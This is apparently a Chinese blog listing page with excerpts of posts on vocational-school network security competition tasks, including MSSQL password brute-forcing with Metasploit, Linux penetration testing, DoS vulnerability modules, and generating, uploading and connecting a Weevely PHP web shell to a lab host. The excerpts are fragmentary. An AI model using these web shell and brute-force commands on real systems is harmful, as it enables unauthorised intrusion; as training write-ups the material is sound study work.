- 博客(10)
- 收藏
- 关注
RSS订阅原创 中职网络安全——数据库安全
进行数据库服务扩展存储过程进行利用,获取系统权限并查看目标系统的异常(黑客)用户,并将该用户作为。进行系统服务及版本扫描渗透测试,并将该操作显示结果中数据库服务对应的服务端口信息作为。Flag值为auxiliary/scanner/mssql_login。Flag值为RHOSTS,ASS_FILE,HREADS,SERNMAE。在上一题的基础上使用命令调用该模块,并查看需要配置的信息(使用。命令,并将扫描弱口令模块的名称作为。命令),将回显中需要配置的目标地址。,爆破获取密码并将得到的密码作为。
2023-10-24 15:31:07
142
原创 使用Weevely工具上传一句话木马
使用命令weevely generate hello /root/hello.php(hello为密码,/root/hello.php为输出路径)来生成weevely一句话木马。使用命令weevely http://172.16.1.113/hackable/uploads/hello.php hello连接weevely木马。在/root目录下生成一个shell.php文件,文件内容为<?使用:file_upload /root/hello.php backdoor.php上传本地文件到目标服务器上。
2023-10-24 15:28:07
732
原创 Linux渗透测试
进行系统服务及版本扫描渗透测试,并将该操作显示结果中。进行操作系统扫描渗透测试,并将该操作显示结果。数据库对应的服务版本信息字符串作为。上传成功后使用中国菜刀进行远程连接。服务爆破出密码,尝试进行登录。尝试对数据库上传一句话木马。的图片文件中的英文单词作为。进行渗透测试,将该场景。通过扫码发现靶机有端口。进行渗透测试,将该场景。进行渗透测试,将该场景。进行渗透测试,将该场景。目录中唯一一个后缀为。目录中唯一一个后缀为。目录中唯一一个后缀为。目录中唯一一个后缀为。
2023-10-24 15:24:18
150
1原创 网络安全漏洞检测
并检测靶机是否存在漏洞,运行此模块,将回显结果中倒数第。拒绝服务漏洞的攻击模块,将运行此模块后回显结果中倒数第。拒绝服务漏洞的辅助扫描模块,将调用此模块的命令作为。拒绝服务攻击模块,将回显结果中的漏洞披露时间作为。运行并找到最后一行一个单词。运行并找到最后一个单词。行的最后一个单词作为。行的最后一个单词作为。...
2022-08-03 19:04:50
2232
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人